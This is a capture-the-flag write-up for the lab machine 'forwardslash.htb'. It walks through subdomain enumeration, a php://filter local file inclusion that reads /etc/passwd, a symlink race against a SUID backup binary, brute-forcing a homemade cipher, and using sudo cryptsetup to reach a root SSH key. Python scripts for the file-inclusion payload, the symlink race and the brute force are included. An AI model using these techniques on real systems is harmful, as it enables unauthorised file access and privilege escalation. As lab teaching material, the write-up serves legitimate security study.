

Run an Nmap scan against the target IP.

Browsing to the website, we can see it redirects to forwardslash.htb, which does not resolve, so the page fails to load.

Add forwardslash.htb to /etc/hosts.

Going back to the website, the site now loads.

I then searched for directories but couldn't find anything, so I enumerated subdomains and found one.

I added the subdomain to /etc/hosts as well.

Searching for directories on the subdomain, I found a '/dev' folder. I tried to enumerate subdirectories inside /dev but couldn't find anything.

Browsing to '/dev' directly, access is denied.

On the subdomain there is a login page with a sign-up option.

Sign up with some credentials and log in.

There is an option to change the profile picture; go to that link.

It is disabled, and nothing can be done with it as-is.

Inspect the page and remove the disabled attribute from the form element.

With the form modified, the submit button is visible and the request can be sent.

Open Burp and capture the request.

Forwarding the request as-is produced an error, so I searched for PHP filters that help with LFI and found this one.

I prepended it to the value of the POST parameter and got a Base64-encoded string back.

Decoding the string gave /etc/passwd. From it we can identify two users: chiv and pain.
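The file read above works because PHP's php://filter wrapper with convert.base64-encode turns an include into a read: the file's bytes come back base64-encoded instead of being executed. The following is an added example, not code from the original write-up; the POST parameter name ("url") and the sample /etc/passwd contents are placeholders I constructed for it. It builds the request body, extracts and decodes the blob from the response, and lists the non-system accounts with a real shell, which is how chiv and pain stand out from the rest of the file.

```python
import base64
import re
from urllib.parse import urlencode

# Assumption: the vulnerable POST parameter takes a path that ends up in a PHP
# include. The write-up does not show the real parameter name; "url" is a stand-in.
PARAM = "url"

NOLOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")


def filter_payload(path: str) -> str:
    """Wrap a local path in the php://filter base64 wrapper.

    include()/require() of this wrapper returns the file base64-encoded rather
    than executing it, so PHP sources and binary-ish files survive the trip.
    """
    return "php://filter/convert.base64-encode/resource=" + path


def post_body(path: str) -> str:
    """Form-encoded POST body with the wrapper prepended to the path value."""
    return urlencode({PARAM: filter_payload(path)})


def decode_response(body: str) -> str:
    """Pull the first long base64 run out of the returned HTML and decode it."""
    m = re.search(r"[A-Za-z0-9+/]{16,}={0,2}", body)
    if m is None:
        raise ValueError("no base64 blob found in response")
    return base64.b64decode(m.group(0)).decode("utf-8", errors="replace")


def login_users(passwd: str) -> list:
    """Accounts from /etc/passwd with uid >= 1000 and an interactive shell."""
    users = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # comments, blank lines, damaged output
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if uid >= 1000 and shell not in NOLOGIN_SHELLS:
            users.append(name)
    return users


# Constructed sample of what the decoded response looked like for /etc/passwd.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin",
    "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin",
    "chiv:x:1000:1000:chiv:/home/chiv:/bin/bash",
    "pain:x:1001:1001:pain:/home/pain:/bin/bash",
])
SAMPLE_RESPONSE = (
    "<html><body>"
    + base64.b64encode(SAMPLE_PASSWD.encode()).decode()
    + "</body></html>"
)

if __name__ == "__main__":
    print(post_body("/etc/passwd"))
    print(login_users(decode_response(SAMPLE_RESPONSE)))
```

The same wrapper reads PHP source that a plain path would execute instead of display, which is why it is worth trying against configuration files and the denied '/dev' folder once the include is confirmed.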

After a lot more enumeration I didn't find much, so I went back to the '/dev' folder found earlier, looked into it, and got a Base64-encoded string.

Decoding it gave chiv's password.

Using those credentials I got a shell as chiv.

Now let's look at the SUID files. There is one owned by the user pain.

We can also see an accessible directory at '/var/backups/', and the config.php.bak inside it is interesting.

I ran the backup binary and noticed that the number next to the ERROR field changes frequently between runs.

I then tried to read config.php.bak in the backups folder directly: permission denied.

So I wrote a bash script that creates a symbolic link, named with the number from the error, pointing at config.php.bak, and runs the backup again while that name is still valid.

After running the script we got pain's password.
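The symlink trick works because the SUID binary opens a file by a name that depends on the clock and complains with that name when it is missing: whoever controls the working directory can plant a link under that name, and the binary then reads the link's target with pain's privileges. The script below is an added example, not the bash script from the write-up, and the numbers-next-to-ERROR format is an assumption (the real format is only visible in the screenshot). To run offline it also constructs a small mock "backup" program that behaves as described (name derived from the time, error containing the name); with the real binary you would pass its path and '/var/backups/config.php.bak' instead.

```python
import os
import re
import subprocess
import sys
import tempfile
import textwrap


def name_from_error(output: str):
    """Extract the changing token next to ERROR in the backup's output.

    Assumption: the token is a run of hex digits or numbers; the write-up only
    says 'the numbers near ERROR' change on every run.
    """
    m = re.search(r"ERROR[^0-9a-fA-F]*([0-9a-fA-F]+)", output)
    return m.group(1) if m else None


def run_in(cmd, cwd: str) -> str:
    return subprocess.run(cmd, cwd=cwd, capture_output=True, text=True).stdout


def plant_and_run(cmd, target: str, workdir: str, attempts: int = 20):
    """Run the binary, symlink the name it complains about to `target`, and
    re-run right away. The name is time-based, so the second run can still
    miss; loop until a run returns content instead of an ERROR line."""
    for _ in range(attempts):
        out = run_in(cmd, workdir)
        name = name_from_error(out)
        if name is None:
            return out  # no error: the binary read (and printed) a file
        link = os.path.join(workdir, name)
        if not os.path.lexists(link):
            os.symlink(target, link)  # dangling links are fine: the binary resolves them
        out = run_in(cmd, workdir)
        if name_from_error(out) is None:
            return out
    return None


# Constructed mock of the SUID backup program, NOT the binary from the box:
# it expects a file named after the current time in its cwd and prints an
# ERROR line carrying that name when the file is absent.
MOCK_BACKUP = textwrap.dedent("""\
    import os, sys, time
    name = str(int(time.time()) // 5)   # 5 s buckets keep the window winnable
    if os.path.exists(name):
        sys.stdout.write(open(name).read())
    else:
        print("ERROR: " + name + " not found")
""")


def demo() -> str:
    """Stand-alone run against the mock; returns what the planted link exposed."""
    with tempfile.TemporaryDirectory() as d:
        mock = os.path.join(d, "backup.py")
        with open(mock, "w") as f:
            f.write(MOCK_BACKUP)
        secret = os.path.join(d, "config.php.bak")  # readable here; on the box only via the SUID binary
        with open(secret, "w") as f:
            f.write("<?php $db_pass = 'example-not-real'; ?>\n")
        return plant_and_run([sys.executable, mock], secret, d) or ""


if __name__ == "__main__":
    print(demo())
```

The important property is that the binary resolves the symlink after its permission check has already happened (it runs as pain), so any file pain can read is reachable this way; the loop only exists to beat the clock-derived name.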

Log in as pain with the credentials we got and read user.txt.

The next step is to escalate privileges to root. There are two files in the encryptorinator folder in pain's home directory.

Download the files and check what they do.

After a while I figured the output might contain a message meant for me, so I added an if-condition to the script to filter its output.

When I ran it, I got a directory path and a password.
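The filtering idea above is the general way to break a homemade cipher with a small key space: try every key and let a predicate pick out the one candidate that reads like text, instead of scrolling through thousands of outputs. This is an added example and not the encryptorinator script or its cipher; toy_encrypt/toy_decrypt are a constructed stand-in with a two-byte key, and the sample message is made up. The brute_force function takes the decrypt routine and the acceptance test as parameters, so the same loop applies to the real script once its decrypt function is pasted in.

```python
import itertools
import string

PRINTABLE = set(string.printable.encode("ascii"))


def toy_encrypt(key: bytes, msg: bytes) -> bytes:
    """Constructed stand-in cipher (not the box's encryptorinator): each byte is
    shifted by the matching key byte plus its own position, modulo 256."""
    return bytes((b + key[i % len(key)] + i) % 256 for i, b in enumerate(msg))


def toy_decrypt(key: bytes, ct: bytes) -> bytes:
    return bytes((b - key[i % len(key)] - i) % 256 for i, b in enumerate(ct))


def looks_like_message(pt: bytes, must_contain=(b"password",)) -> bool:
    """The 'if' that replaces eyeballing candidates: every byte printable and at
    least one word we expect in a message to the attacker present."""
    return all(b in PRINTABLE for b in pt) and any(w in pt for w in must_contain)


def brute_force(ct: bytes, key_len: int = 2, decrypt=toy_decrypt, accept=looks_like_message):
    """Try every key of key_len bytes; return (key, plaintext) for the first
    candidate the predicate accepts, or None if nothing passes."""
    for key in itertools.product(range(256), repeat=key_len):
        pt = decrypt(bytes(key), ct)
        if accept(pt):
            return bytes(key), pt
    return None


# Constructed sample: a message carrying a path and a password, as the box's did.
SAMPLE_KEY = bytes([0x2A, 0x73])
SAMPLE_MSG = b"container is in /example/dir, password is example-not-real"
SAMPLE_CT = toy_encrypt(SAMPLE_KEY, SAMPLE_MSG)


def recover():
    return brute_force(SAMPLE_CT)


if __name__ == "__main__":
    key, pt = recover()
    print(key.hex(), pt.decode())
```

With a longer key the product over range(256) grows exponentially; at that point the filter stays the same but the search would have to exploit structure in the cipher (position-by-position recovery, or a key alphabet restricted to what a human would type) rather than enumerate everything.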

Checking which commands pain can run with sudo:

Using cryptsetup to decrypt it, I entered the password I obtained together with the directory path.

After mounting it I found an id_rsa file and logged in as root with it.

Got root.